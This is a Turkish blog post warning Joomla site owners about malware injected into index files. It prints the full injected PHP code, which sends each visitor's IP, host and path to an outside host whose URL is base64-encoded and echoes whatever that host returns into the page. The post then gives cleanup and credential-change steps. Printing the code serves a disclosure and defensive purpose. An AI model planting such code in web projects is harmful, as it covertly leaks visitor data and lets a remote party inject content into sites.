PAYLAŞ
Bot Birüsü
(Son Güncelleme: 18 Şubat 2017)

Bir site tarafından yayılan virüse son 10 günde, benim ftp erişimi sağlamadığım 2 ayrı yerde rastladım. Bu virüsü kaspersky kullanıcıları farkedemiyor ancak ESET kullanıcıları standart yapılandırma farkedebiliyor. Virüs Joomla!’nın ana index dosyası, administrator altındaki index dosyası ve tema index dosyalarına (system dahil) bulaşıyor.

Bir site tarafından yayılan virüse son 10 günde, benim ftp erişimi sağlamadığım 2 ayrı yerde rastladım. Bu virüsü kaspersky kullanıcıları farkedemiyor ancak ESET kullanıcıları standart yapılandırma farkedebiliyor. Virüs Joomla!’nın ana index dosyası, administrator altındaki index dosyası ve tema index dosyalarına (system dahil) bulaşıyor. Ancak ana dizin index dosyasında ilk anda yer almıyor.

Bu da sonradan uzaktan tetiklendiği kanısını uyandırıyor bende. Bu kanıya sebep olan bir başka şey ise ana dizine ek dosya oluşturulması. Virüs sisteme bulaştıktan bir ya da birkaç gün sonra ana dizinde kendine ek bir dosya oluşturuyor.

Virüsü yayan site:{kod}botsvsbrowsers .com{/kod}

Virüs içeriği: {kod} ?><?php if (!isset($sRetry)) { global $sRetry; $sRetry = 1; // This code use for global bot statistic $sUserAgent = strtolower($_SERVER[‘HTTP_USER_AGENT’]); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = “”; if((strstr($sUserAgent, ‘google’) == false)&&(strstr($sUserAgent, ‘yahoo’) == false)&&(strstr($sUserAgent, ‘baidu’) == false)&&(strstr($sUserAgent, ‘msn’) == false)&&(strstr($sUserAgent, ‘opera’) == false)&&(strstr($sUserAgent, ‘chrome’) == false)&&(strstr($sUserAgent, ‘bing’) == false)&&(strstr($sUserAgent, ‘safari’) == false)&&(strstr($sUserAgent, ‘bot’) == false)) // Bot comes { if(isset($_SERVER[‘REMOTE_ADDR’]) == true && isset($_SERVER[‘HTTP_HOST’]) == true){ // Create bot analitics $stCurlLink = base64_decode( ‘aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==’).’?ip=’.urlencode($_SERVER[‘REMOTE_ADDR’]).’&useragent=’.urlencode($sUserAgent).’&domainname=’.urlencode($_SERVER[‘HTTP_HOST’]).’&fullpath=’.urlencode($_SERVER[‘REQUEST_URI’]).’&check=’.isset($_GET[‘look’]); @$stCurlHandle = curl_init( $stCurlLink ); } } if ( $stCurlHandle !== NULL ) { curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]==”O”) {$sResult[0]=” “; echo $sResult; // Statistic code end } curl_close($stCurlHandle); } }{/kod} Virüs bu kod ile şimdilik kendine dolaylı yoldan hit sağlıyor. Ancak uzaktan hesabınıza sızan birinin başka neler yapabileceğini bilemezsiniz. Şifrelenmiş alanda şu sayaç sayfası yer alıyor.{kod}botstatisticupdate. com/stat/stat.php{/kod}

Özellikle Kaspersky kullanıcıları sitelerini en kısa zamanda kontrol etmeliler. Önemli bir uyarı; kasperskynin görmediği bu virüsü arama motoru botları görüyor, Google belirli bir süre içinde tekraren virüs gördüğü siteyi güvensiz olarak işaretliyor; unutmayın.

VİRÜS TEMİZLİĞİ

Virüsü temizlemek için öncelikle hiç bir müdaha etmeden evvel aşağıdaki dosyayı indirip site dizininize gönderin ve tarayıcıdan çağırarak son değiştirilen dosyaları görün. Buna göre hangi dosyaların etkilendiğini tesbit etmeniz kolay olacak:

Dosya Sistemi Değiştirildiğinden, Dosya Bulunamadı

Sonra bu dosyalardan Joomla paketi ile gelenleri yeni bir Joomla paketinden, sonradan kurulan eklentilerle gelenleri ise o eklentilerin yeni paketlerinden değiştirin, tazeleyin. Joomla dizin güncellemesi, Joomla paketi ile gelen tüm dosyaları yeniler, aklınızda olsun. Çok dosya yenileneceğinde kolay bir yöntem olarak uygulanabilir. Ancak sonradan kurulan eklentilerin dosyalarını asla unutmayın. Ayrıca silinmesi gereken dosyalar varsa silmelisiniz.

Son olarak sunucuya erişim bilgilerinizi, ftp bilgilerinizi ve Joomla yönetici bilgilerinizi tedbiren değiştirin. Unutmayın; bu tür virüsler genelde siteye ftp erişimi alan bilgisayarlardan (çoğunlukla sizin bilgisayarınızdan) bulaşır. Bilgisayarlarınızın temiz olduğuna emin olmalısınız.

Geçmiş olsun.

BİR CEVAP BIRAK

Yorumunuzu ekleyin
Buraya adınızı yazın